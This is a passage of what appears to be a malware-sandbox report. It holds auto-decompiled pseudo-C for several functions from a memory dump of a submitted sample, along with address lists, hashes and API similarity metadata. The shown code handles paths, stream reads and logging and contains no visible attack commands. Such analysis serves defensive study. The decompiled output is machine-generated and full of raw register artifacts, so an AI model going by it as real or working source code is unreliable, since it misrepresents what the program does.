					_t118 =  *((intOrPtr*)(_t117 + 2));
					__eflags = _t118 - 1;
					if(_t118 == 1) {
						L7:
						_t25 = _t222 + 0x13;
						 *_t25 =  *(_t222 + 0x13) & 0x00000000;
						__eflags =  *_t25;
						L8:
						E003B2D47(_t222 - 0x3c);
						 *(_t222 - 0x1c) =  *(_t222 - 0x1c) | 0xffffffff;
						 *(_t222 - 4) = 1;
						if( *(_t222 - 0x2c) >= 3) {
							_t158 =  *((intOrPtr*)(_t222 - 0x30));
							if( *((intOrPtr*)( *_t158 + 4)) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t158 + 4)) + 4)) == 0 && wcscmp( *( *(_t158 + 8)), 0x42938c) == 0) {
								 *(_t222 - 0x1c) = 2;
							}
						}
						if( *(_t222 + 8) == 2) {
							L32:
							_t210 =  *((intOrPtr*)(_t222 - 0x20));
							_t217 = E003B4A10(_t210, _t222 - 0x3c);
							if(_t121 < 0) {
								_t217 =  *(_t210 + 4);
								E003B2F2F(E003B51D3(_t210), _t222 - 0x3c);
							}
							if( *(_t222 + 8) == 2 ||  *(_t222 - 0x2c) != 0 && ( *(_t222 - 0x2c) != 1 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30)))) + 4)) != 0)) {
								_t168 =  *((intOrPtr*)(_t222 - 0x10));
							} else {
								E003D6B24(_t222 - 0x30);
								_t136 = E003B2DCD(_t222 - 0x48, 0x429390);
								 *(_t222 - 4) = 2;
								E003EF23F(_t222 - 0x30);
								_push(_t136);
								E003B1E40(E003B1524(_t222 - 0x30),  *((intOrPtr*)(_t222 - 0x48)));
								 *(_t222 - 0xd) = 1;
								 *(_t222 + 0x13) = 1;
								 *((char*)(_t222 - 0xf)) = 1;
								_t168 = 0;
							}
							 *((intOrPtr*)(_t222 - 0x58)) = 0;
							 *((intOrPtr*)(_t222 - 0x54)) = 0;
							 *((intOrPtr*)(_t222 - 0x50)) = 0;
							 *(_t222 - 4) = 3;
							E003B4F40(_t222 - 0x58, _t222 - 0x30);
							 *((char*)(_t222 - 0x4a)) =  *(_t222 + 0x13);
							 *((char*)(_t222 - 0x4b)) =  *(_t222 - 0xd);
							 *((char*)(_t222 - 0x49)) =  *((intOrPtr*)(_t222 - 0xf));
							 *((char*)(_t222 - 0x4c)) = _t168;
							E003B470C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x20)))) + _t217 * 4)) + 0xc,  *((intOrPtr*)(_t222 + 0xc)), _t222 - 0x58,  *(_t222 - 0x1c));
							 *(_t222 - 4) = 1;
							E003B1E40(E003D0A72(_t168, _t222 - 0x58),  *((intOrPtr*)(_t222 - 0x3c)));
							 *(_t222 - 4) =  *(_t222 - 4) | 0xffffffff;
							_t134 = E003D0A72(_t168, _t222 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t222 - 0xc));
							return _t134;
						} else {
							 *(_t222 - 0x1c) =  *(_t222 - 0x1c) | 0xffffffff;
							_t213 = E003B4D65(_t222 - 0x30);
							_t146 =  *(_t222 - 0x2c);
							 *(_t222 - 0x24) = _t213;
							 *(_t222 - 0x14) = _t213;
							if( *(_t222 + 8) != 1 && _t213 != 0 && _t146 > _t213) {
								_t46 = _t146 - 1; // 0x2
								 *(_t222 - 0x14) = _t46;
							}
							 *(_t222 - 0x18) =  *(_t222 - 0x18) | 0xffffffff;
							if(_t213 >= _t146) {
								L27:
								_t214 = 0;
								if( *(_t222 - 0x14) <= 0) {
									goto L32;
								} else {
									goto L28;
								}
								do {
									L28:
									_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30))));
									if( *((char*)( *((intOrPtr*)(_t222 + 0x14)) + 1)) != 0 && _t214 >=  *(_t222 - 0x24)) {
										_t152 = E003B454D(_t219);
										_t247 = _t152;
										if(_t152 != 0) {
											goto L32;
										}
									}
									E003B3128(_t222 - 0x3c, _t247, _t219);
									E003B1089(_t222 - 0x3c, 0x5c);
									E003B50A5(_t222 - 0x30, 0);
									_t214 = _t214 + 1;
								} while (_t214 <  *(_t222 - 0x14));
								goto L32;
							} else {
								do {
									_t220 =  *( *((intOrPtr*)(_t222 - 0x30)) + _t213 * 4);
									if(wcscmp( *_t220, 0x429398) == 0 || wcscmp( *_t220, 0x429394) == 0) {
										 *(_t222 - 0x18) = _t213;
									}
									_t156 =  *(_t222 - 0x2c);
									_t213 = _t213 + 1;
								} while (_t213 < _t156);
								if( *(_t222 - 0x18) >= 0) {
									_t56 = _t156 - 1; // 0x2
									if( *(_t222 - 0x18) != _t56) {
										_t156 = _t156 - 1;
									}
									 *(_t222 - 0x14) = _t156;
								}
								goto L27;
							}
						}
					}
					__eflags = _t118 - 2;
					if(_t118 != 2) {
						goto L8;
					}
					_t162 = E003B454D(_t173);
					__eflags = _t162;
					if(_t162 == 0) {
						goto L8;
					}
					goto L7;
				}
				 *(_t222 - 0xd) =  *(_t222 - 0xd) & 0x00000000;
				E003B507F(_t222 - 0x30);
				goto L8;
			}





















                                                                                                    0x003b4ac0
                                                                                                    0x003b4ac8
                                                                                                    0x003b4acc
                                                                                                    0x003b4ad1
                                                                                                    0x003b4ad4
                                                                                                    0x003b4ad9
                                                                                                    0x003b4ade
                                                                                                    0x003b4adf
                                                                                                    0x003b4ae6
                                                                                                    0x003b4ae6
                                                                                                    0x003b4aed
                                                                                                    0x003b4af0
                                                                                                    0x003b4af3
                                                                                                    0x003b4af9
                                                                                                    0x003b4afc
                                                                                                    0x003b4b01
                                                                                                    0x003b4b0f
                                                                                                    0x003b4b13
                                                                                                    0x003b4b17
                                                                                                    0x003b4b1b
                                                                                                    0x003b4b20
                                                                                                    0x003b4b21
                                                                                                    0x003b4b31
                                                                                                    0x003b4b34
                                                                                                    0x003b4b36
                                                                                                    0x003b4b45
                                                                                                    0x003b4b45
                                                                                                    0x003b4b45
                                                                                                    0x003b4b45
                                                                                                    0x003b4b49
                                                                                                    0x003b4b4c
                                                                                                    0x003b4b51
                                                                                                    0x003b4b5f
                                                                                                    0x003b4b63
                                                                                                    0x003b4b65
                                                                                                    0x003b4b6e
                                                                                                    0x003b4b8c
                                                                                                    0x003b4b8c
                                                                                                    0x003b4b6e
                                                                                                    0x003b4b97
                                                                                                    0x003b4c5b
                                                                                                    0x003b4c5b
                                                                                                    0x003b4c69
                                                                                                    0x003b4c6d
                                                                                                    0x003b4c6f
                                                                                                    0x003b4c7f
                                                                                                    0x003b4c7f
                                                                                                    0x003b4c88
                                                                                                    0x003b4ce6
                                                                                                    0x003b4ca1
                                                                                                    0x003b4ca4
                                                                                                    0x003b4cb1
                                                                                                    0x003b4cbb
                                                                                                    0x003b4cbf
                                                                                                    0x003b4cc4
                                                                                                    0x003b4cd0
                                                                                                    0x003b4cd6
                                                                                                    0x003b4cda
                                                                                                    0x003b4cde
                                                                                                    0x003b4ce2
                                                                                                    0x003b4ce2
                                                                                                    0x003b4ceb
                                                                                                    0x003b4cee
                                                                                                    0x003b4cf1
                                                                                                    0x003b4cfb
                                                                                                    0x003b4cff
                                                                                                    0x003b4d0a
                                                                                                    0x003b4d10
                                                                                                    0x003b4d16
                                                                                                    0x003b4d1f
                                                                                                    0x003b4d2e
                                                                                                    0x003b4d36
                                                                                                    0x003b4d42
                                                                                                    0x003b4d47
                                                                                                    0x003b4d4f
                                                                                                    0x003b4d5a
                                                                                                    0x003b4d62
                                                                                                    0x003b4b9d
                                                                                                    0x003b4b9d
                                                                                                    0x003b4bad
                                                                                                    0x003b4baf
                                                                                                    0x003b4bb2
                                                                                                    0x003b4bb5
                                                                                                    0x003b4bb8
                                                                                                    0x003b4bc2
                                                                                                    0x003b4bc5
                                                                                                    0x003b4bc5
                                                                                                    0x003b4bc8
                                                                                                    0x003b4bce
                                                                                                    0x003b4c13
                                                                                                    0x003b4c13
                                                                                                    0x003b4c18
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4c1a
                                                                                                    0x003b4c1a
                                                                                                    0x003b4c1d
                                                                                                    0x003b4c26
                                                                                                    0x003b4c2f
                                                                                                    0x003b4c34
                                                                                                    0x003b4c36
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4c36
                                                                                                    0x003b4c3c
                                                                                                    0x003b4c46
                                                                                                    0x003b4c50
                                                                                                    0x003b4c55
                                                                                                    0x003b4c56
                                                                                                    0x00000000
                                                                                                    0x003b4bd0
                                                                                                    0x003b4bd0
                                                                                                    0x003b4bd8
                                                                                                    0x003b4be4
                                                                                                    0x003b4bf6
                                                                                                    0x003b4bf6
                                                                                                    0x003b4bf9
                                                                                                    0x003b4bfc
                                                                                                    0x003b4bfd
                                                                                                    0x003b4c05
                                                                                                    0x003b4c07
                                                                                                    0x003b4c0d
                                                                                                    0x003b4c0f
                                                                                                    0x003b4c0f
                                                                                                    0x003b4c10
                                                                                                    0x003b4c10
                                                                                                    0x00000000
                                                                                                    0x003b4c05
                                                                                                    0x003b4bce
                                                                                                    0x003b4b97
                                                                                                    0x003b4b38
                                                                                                    0x003b4b3a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4b3c
                                                                                                    0x003b4b41
                                                                                                    0x003b4b43
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4b43
                                                                                                    0x003b4b23
                                                                                                    0x003b4b2a
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscmp$ExceptionH_prologThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2750596395-0
                                                                                                    • Opcode ID: 66f653915933b992eb994f3516c6f6f9ae167978f5757bd3c3238432fe66036a
                                                                                                    • Instruction ID: c29a64d93c11b6b7c35e6f86584e9ff871cb7a54f865e1eac7b3a55e362e5cd2
                                                                                                    • Opcode Fuzzy Hash: 66f653915933b992eb994f3516c6f6f9ae167978f5757bd3c3238432fe66036a
                                                                                                    • Instruction Fuzzy Hash: 6E91F331D01248EFCF16DFA8D885BEDFBB0BF49318F148059E6516B692DB309A45CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FB02E Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E003FB02E(void* __ecx, void* __eflags) {
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				signed int _t92;
				void* _t94;
				signed int _t105;
				intOrPtr* _t107;
				void* _t116;
				void* _t117;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t128;
				signed int _t130;
				void* _t132;
				void* _t134;
				void* _t135;
				void* _t137;

				E0041F1B0(0x427890, _t132);
				_t135 = _t134 - 0x14;
				_t128 = __ecx;
				_t120 = __ecx + 0x58;
				_t60 = E003BFDBD(__eflags, 0x20); // executed
				if(_t60 == 0) {
					if(E003FB26D(_t120) == 0) {
						_t92 =  *(_t132 + 0xc);
						__eflags = _t92;
						if(_t92 == 0) {
							L6:
							_t122 =  *0x42f994();
							__eflags = _t122;
							 *(_t132 - 0x14) = _t122;
							if(_t122 == 0) {
								_push(0x42ffc8);
								_push(_t132 + 8);
								 *((intOrPtr*)(_t132 + 8)) = 1;
								L0041F1D0();
							}
							 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
							memcpy(_t122, _t128 + 0x58, 0x20);
							 *(_t132 - 0x20) =  *(_t132 - 0x20) & 0x00000000;
							_t137 = _t135 + 0xc;
							_t13 = _t132 - 0x1c;
							 *_t13 =  *(_t132 - 0x1c) & 0x00000000;
							__eflags =  *_t13;
							while(1) {
								_t112 = 0x7fe0;
								__eflags =  *(_t132 - 0x20) |  *(_t132 - 0x1c);
								if(( *(_t132 - 0x20) |  *(_t132 - 0x1c)) != 0) {
									_t112 = 0x8000;
									__eflags = 0x7fe0;
								}
								__eflags = _t92;
								if(_t92 == 0) {
									goto L17;
								}
								_t105 =  *_t92 -  *(_t132 - 0x20);
								asm("sbb eax, [ebp-0x1c]");
								__eflags = 0 -  *(_t92 + 4);
								if(__eflags >= 0) {
									if(__eflags > 0) {
										L15:
										_t112 = _t105;
									} else {
										__eflags = _t112 - _t105;
										if(_t112 > _t105) {
											goto L15;
										}
									}
								}
								__eflags = _t112;
								if(_t112 == 0) {
									L25:
									_t130 = 1;
								} else {
									goto L17;
								}
								L27:
								_t55 = _t132 - 4;
								 *_t55 =  *(_t132 - 4) | 0xffffffff;
								__eflags =  *_t55;
								 *0x42f998();
								_t60 = _t130;
								goto L28;
								L17:
								_t67 =  *((intOrPtr*)(_t132 + 8));
								 *(_t132 - 0x10) =  *(_t132 - 0x10) & 0x00000000;
								_t23 = _t122 + 0x20; // 0x20
								_t68 =  *((intOrPtr*)( *_t67 + 0xc))(_t67, _t23, _t112, _t132 - 0x10);
								__eflags = _t68;
								if(_t68 != 0) {
									_t130 = _t68;
								} else {
									_t70 =  *(_t132 - 0x10);
									__eflags = _t70;
									if(_t70 == 0) {
										goto L25;
									} else {
										_t26 = _t122 + 1; // 0x1
										 *((intOrPtr*)(_t132 - 0x18)) = _t26 + _t70;
										_t94 = E003FB204(_t26, _t26 + _t70);
										__eflags = _t94 -  *((intOrPtr*)(_t132 - 0x18));
										if(_t94 >=  *((intOrPtr*)(_t132 - 0x18))) {
											L23:
											_t72 =  *(_t132 - 0x10);
											 *(_t132 - 0x20) =  *(_t132 - 0x20) + _t72;
											asm("adc dword [ebp-0x1c], 0x0");
											memmove(_t122, _t122 + _t72, 0x20);
											_t92 =  *(_t132 + 0xc);
											_t137 = _t137 + 0xc;
											continue;
										} else {
											while(1) {
												_t124 = _t94 -  *(_t132 - 0x14);
												_t116 = 0x14;
												_t75 = E0041E1B0(_t94 + 0xc, _t116);
												_t75 -  *((intOrPtr*)(_t94 + 8)) = _t75 & 0xffffff00 | _t75 ==  *((intOrPtr*)(_t94 + 8));
												if((_t75 & 0xffffff00 | _t75 ==  *((intOrPtr*)(_t94 + 8))) != 0) {
													break;
												}
												 *((intOrPtr*)(_t132 - 0x18)) =  *(_t132 - 0x14) + 1 +  *(_t132 - 0x10);
												_t94 = E003FB204( *(_t132 - 0x14) + 1 + _t124,  *(_t132 - 0x14) + 1 +  *(_t132 - 0x10));
												__eflags = _t94 -  *((intOrPtr*)(_t132 - 0x18));
												if(_t94 <  *((intOrPtr*)(_t132 - 0x18))) {
													continue;
												} else {
													_t122 =  *(_t132 - 0x14);
													goto L23;
												}
												goto L27;
											}
											memcpy(_t128 + 0x58, _t94, 0x20);
											_t107 =  *((intOrPtr*)(_t132 + 8));
											asm("adc eax, [ebp-0x1c]");
											 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x40)) + _t124 +  *(_t132 - 0x20);
											_t117 = 0;
											asm("adc [esi+0x44], eax");
											_t81 =  *((intOrPtr*)(_t128 + 0x40)) + 0x20;
											__eflags = _t81;
											asm("adc esi, edx");
											_t82 =  *((intOrPtr*)( *_t107 + 0x10))(_t107, _t81,  *((intOrPtr*)(_t128 + 0x44)), _t117, _t117);
											_t122 =  *(_t132 - 0x14);
											_t130 = _t82;
										}
									}
								}
								goto L27;
							}
						} else {
							__eflags =  *_t92 |  *(_t92 + 4);
							if(( *_t92 |  *(_t92 + 4)) != 0) {
								goto L6;
							} else {
								_t60 = 1;
							}
						}
					} else {
						_t60 = 0;
					}
				}
				L28:
				 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
				return _t60;
			}


























                                                                                                    0x003fb033
                                                                                                    0x003fb038
                                                                                                    0x003fb03d
                                                                                                    0x003fb045
                                                                                                    0x003fb04a
                                                                                                    0x003fb051
                                                                                                    0x003fb060
                                                                                                    0x003fb069
                                                                                                    0x003fb06c
                                                                                                    0x003fb06e
                                                                                                    0x003fb07f
                                                                                                    0x003fb08f
                                                                                                    0x003fb091
                                                                                                    0x003fb093
                                                                                                    0x003fb096
                                                                                                    0x003fb09b
                                                                                                    0x003fb0a0
                                                                                                    0x003fb0a1
                                                                                                    0x003fb0a8
                                                                                                    0x003fb0a8
                                                                                                    0x003fb0ad
                                                                                                    0x003fb0b8
                                                                                                    0x003fb0bd
                                                                                                    0x003fb0c1
                                                                                                    0x003fb0c4
                                                                                                    0x003fb0c4
                                                                                                    0x003fb0c4
                                                                                                    0x003fb0c8
                                                                                                    0x003fb0cb
                                                                                                    0x003fb0d0
                                                                                                    0x003fb0d3
                                                                                                    0x003fb0d5
                                                                                                    0x003fb0d5
                                                                                                    0x003fb0d5
                                                                                                    0x003fb0d8
                                                                                                    0x003fb0da
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fb0e1
                                                                                                    0x003fb0e4
                                                                                                    0x003fb0e9
                                                                                                    0x003fb0eb
                                                                                                    0x003fb0ed
                                                                                                    0x003fb0f3
                                                                                                    0x003fb0f3
                                                                                                    0x003fb0ef
                                                                                                    0x003fb0ef
                                                                                                    0x003fb0f1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fb0f1
                                                                                                    0x003fb0ed
                                                                                                    0x003fb0f5
                                                                                                    0x003fb0f7
                                                                                                    0x003fb191
                                                                                                    0x003fb193
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fb1d3
                                                                                                    0x003fb1d3
                                                                                                    0x003fb1d3
                                                                                                    0x003fb1d3
                                                                                                    0x003fb1de
                                                                                                    0x003fb1e4
                                                                                                    0x00000000
                                                                                                    0x003fb0fd
                                                                                                    0x003fb0fd
                                                                                                    0x003fb100
                                                                                                    0x003fb10b
                                                                                                    0x003fb110
                                                                                                    0x003fb113
                                                                                                    0x003fb115
                                                                                                    0x003fb18d
                                                                                                    0x003fb117
                                                                                                    0x003fb117
                                                                                                    0x003fb11a
                                                                                                    0x003fb11c
                                                                                                    0x00000000
                                                                                                    0x003fb11e
                                                                                                    0x003fb11e
                                                                                                    0x003fb124
                                                                                                    0x003fb12c
                                                                                                    0x003fb12e
                                                                                                    0x003fb131
                                                                                                    0x003fb16c
                                                                                                    0x003fb16c
                                                                                                    0x003fb171
                                                                                                    0x003fb174
                                                                                                    0x003fb17c
                                                                                                    0x003fb182
                                                                                                    0x003fb185
                                                                                                    0x00000000
                                                                                                    0x003fb133
                                                                                                    0x003fb133
                                                                                                    0x003fb137
                                                                                                    0x003fb13a
                                                                                                    0x003fb13e
                                                                                                    0x003fb149
                                                                                                    0x003fb14b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fb15a
                                                                                                    0x003fb162
                                                                                                    0x003fb164
                                                                                                    0x003fb167
                                                                                                    0x00000000
                                                                                                    0x003fb169
                                                                                                    0x003fb169
                                                                                                    0x00000000
                                                                                                    0x003fb169
                                                                                                    0x00000000
                                                                                                    0x003fb167
                                                                                                    0x003fb19d
                                                                                                    0x003fb1aa
                                                                                                    0x003fb1af
                                                                                                    0x003fb1b2
                                                                                                    0x003fb1b5
                                                                                                    0x003fb1b8
                                                                                                    0x003fb1c3
                                                                                                    0x003fb1c3
                                                                                                    0x003fb1c6
                                                                                                    0x003fb1cb
                                                                                                    0x003fb1ce
                                                                                                    0x003fb1d1
                                                                                                    0x003fb1d1
                                                                                                    0x003fb131
                                                                                                    0x003fb11c
                                                                                                    0x00000000
                                                                                                    0x003fb115
                                                                                                    0x003fb070
                                                                                                    0x003fb072
                                                                                                    0x003fb075
                                                                                                    0x00000000
                                                                                                    0x003fb077
                                                                                                    0x003fb079
                                                                                                    0x003fb079
                                                                                                    0x003fb075
                                                                                                    0x003fb062
                                                                                                    0x003fb062
                                                                                                    0x003fb062
                                                                                                    0x003fb060
                                                                                                    0x003fb1e6
                                                                                                    0x003fb1ec
                                                                                                    0x003fb1f4

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: cc0ab7aa31b09271905eabbc46c262df480bc298c6cff4347f45c79a5364dc3d
                                                                                                    • Instruction ID: 2a75890a2af6eede3903059f7f77a928e4b0d142412019a0d38dcda351c23e68
                                                                                                    • Opcode Fuzzy Hash: cc0ab7aa31b09271905eabbc46c262df480bc298c6cff4347f45c79a5364dc3d
                                                                                                    • Instruction Fuzzy Hash: 5551A5B5B0031AAFDB11DF54C880BBEF3B5FF88354F158429EA119B641DB74A945CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E4912 Relevance: 7.7, APIs: 5, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E003E4912(intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr* _a20) {
				char* _t53;
				intOrPtr _t54;
				void* _t55;
				void* _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				signed char* _t85;
				signed char** _t90;
				char** _t111;
				intOrPtr* _t112;
				intOrPtr _t114;

				EnterCriticalSection(0x43a878);
				_t114 = _a4;
				E003B2ECB(_t114 + 0x104, _a8);
				_t85 = 0;
				_push(1);
				_t53 = _a16;
				_pop(0);
				if(_t53 == 0) {
					_t54 =  *0x42c1e8; // 0x429630
					L10:
					_a16 = _t54;
					L11:
					if( *((intOrPtr*)(_t114 + 0x168)) < 0 ||  *(_t114 + 0xc8) == _t85) {
						_a7 = _a7 & 0x00000000;
					} else {
						_a7 = 1;
						E003E4AF9(_t114);
						_t111 = _t114 + 0xec;
						E003B2711(_t111, _a16);
						if(_a8 != _t85) {
							E003B2820();
						}
						fputs( *_t111,  *( *(_t114 + 0xc8)));
						_t112 = _t114 + 0xf8;
						 *(_t112 + 4) = 0;
						 *((short*)( *_t112)) = 0;
						if(_a8 != 0) {
							E003B2ECB(_t112, _a8);
							E003B209A( *(_t114 + 0xc8), _t112);
							if(_a12 != 0 &&  *((intOrPtr*)(_t114 + 0xfc)) != 0 &&  *((short*)( *_t112 +  *(_t112 + 4) * 2 - 2)) != 0x5c) {
								E003B1089(_t112, 0x5c);
							}
						}
						E003B2010( *(_t114 + 0xc8), _t112, _t114 + 0xec);
						if(_a20 != 0) {
							fputs(" <",  *( *(_t114 + 0xc8)));
							fputs(">",  *(E003B2201( *(_t114 + 0xc8),  *_a20,  *((intOrPtr*)(_a20 + 4)))));
						}
						E003B1FA0( *(_t114 + 0xc8));
						if( *((char*)(_t114 + 0x160)) != 0) {
							L003B1F91( *(_t114 + 0xc8));
						}
						_t85 = 0;
					}
					if( *((intOrPtr*)(_t114 + 0xbc)) != _t85) {
						if( *((intOrPtr*)(_t114 + 0x164)) >= 1) {
							_t110 = _t114 + 0x3c;
							_t90 = _t114 + 0x30;
							 *(_t114 + 0x40) = _t85;
							 *( *(_t114 + 0x3c)) = _t85;
							_t90[1] = _t85;
							 *( *_t90) =  *( *_t90) & 0x00000000;
							if( *((intOrPtr*)(_t114 + 0x164)) > 1 || _a7 == 0) {
								E003B2711(_t90, _a16);
								if(_a8 != _t85) {
									E003B2ECB(_t110, _a8);
								}
							}
						}
						E003EB734(_t114 + 0x18); // executed
					}
					_t55 = E003E571F();
					LeaveCriticalSection(0x43a878);
					return _t55;
				}
				_t80 = _t53 - 1;
				if(_t80 == 0) {
					_t54 =  *0x42c1e4; // 0x42c4e8
					goto L10;
				}
				_t81 = _t80 - 1;
				if(_t81 == 0) {
					_t82 =  *0x42c1ec; // 0x42965c
					_a16 = _t82;
					L5:
					_push(2);
					_pop(0);
					goto L11;
				}
				if(_t81 == 1) {
					_t84 =  *0x42c1f0; // 0x42c4e4
					_a16 = _t84;
					goto L11;
				} else {
					_a16 = "???";
					goto L5;
				}
			}















                                                                                                    0x003e491d
                                                                                                    0x003e4923
                                                                                                    0x003e492f
                                                                                                    0x003e4937
                                                                                                    0x003e4939
                                                                                                    0x003e493b
                                                                                                    0x003e493d
                                                                                                    0x003e493e
                                                                                                    0x003e4972
                                                                                                    0x003e4977
                                                                                                    0x003e4977
                                                                                                    0x003e497a
                                                                                                    0x003e4980
                                                                                                    0x003e4af3
                                                                                                    0x003e4992
                                                                                                    0x003e4994
                                                                                                    0x003e4998
                                                                                                    0x003e49a0
                                                                                                    0x003e49a8
                                                                                                    0x003e49b0
                                                                                                    0x003e49b4
                                                                                                    0x003e49b4
                                                                                                    0x003e49c9
                                                                                                    0x003e49cc
                                                                                                    0x003e49da
                                                                                                    0x003e49dd
                                                                                                    0x003e49e0
                                                                                                    0x003e49e7
                                                                                                    0x003e49f3
                                                                                                    0x003e49fc
                                                                                                    0x003e4a18
                                                                                                    0x003e4a18
                                                                                                    0x003e49fc
                                                                                                    0x003e4a2b
                                                                                                    0x003e4a34
                                                                                                    0x003e4a43
                                                                                                    0x003e4a5d
                                                                                                    0x003e4a60
                                                                                                    0x003e4a67
                                                                                                    0x003e4a73
                                                                                                    0x003e4a7b
                                                                                                    0x003e4a7b
                                                                                                    0x003e4a80
                                                                                                    0x003e4a80
                                                                                                    0x003e4a88
                                                                                                    0x003e4a91
                                                                                                    0x003e4a96
                                                                                                    0x003e4a99
                                                                                                    0x003e4a9c
                                                                                                    0x003e4a9f
                                                                                                    0x003e4aa4
                                                                                                    0x003e4aa7
                                                                                                    0x003e4ab1
                                                                                                    0x003e4abc
                                                                                                    0x003e4ac4
                                                                                                    0x003e4acb
                                                                                                    0x003e4acb
                                                                                                    0x003e4ac4
                                                                                                    0x003e4ab1
                                                                                                    0x003e4ad3
                                                                                                    0x003e4ad3
                                                                                                    0x003e4ad8
                                                                                                    0x003e4ae4
                                                                                                    0x003e4af0
                                                                                                    0x003e4af0
                                                                                                    0x003e4940
                                                                                                    0x003e4941
                                                                                                    0x003e496b
                                                                                                    0x00000000
                                                                                                    0x003e496b
                                                                                                    0x003e4943
                                                                                                    0x003e4944
                                                                                                    0x003e4961
                                                                                                    0x003e4966
                                                                                                    0x003e4950
                                                                                                    0x003e4950
                                                                                                    0x003e4952
                                                                                                    0x00000000
                                                                                                    0x003e4952
                                                                                                    0x003e4947
                                                                                                    0x003e4955
                                                                                                    0x003e495c
                                                                                                    0x00000000
                                                                                                    0x003e4949
                                                                                                    0x003e4949
                                                                                                    0x00000000
                                                                                                    0x003e4949

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1081906680-0
                                                                                                    • Opcode ID: 52340e04722c2d5cc6209b6b02a012fa181da6ff3cd3541568ef8c54dd6eca29
                                                                                                    • Instruction ID: 87e4a84e9865847f18aafed9c5b6a8c02c0c9f15c5327baba7e9f2a9e83bcf7a
                                                                                                    • Opcode Fuzzy Hash: 52340e04722c2d5cc6209b6b02a012fa181da6ff3cd3541568ef8c54dd6eca29
                                                                                                    • Instruction Fuzzy Hash: 4151D230200356DFDB26DF21D885BEA77A1FF48318F00862EF55A5B6D1CB71A891CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B695D Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 398COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 96%
                                                                                                    			E003B695D(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t168;
				intOrPtr _t169;
				signed int _t172;
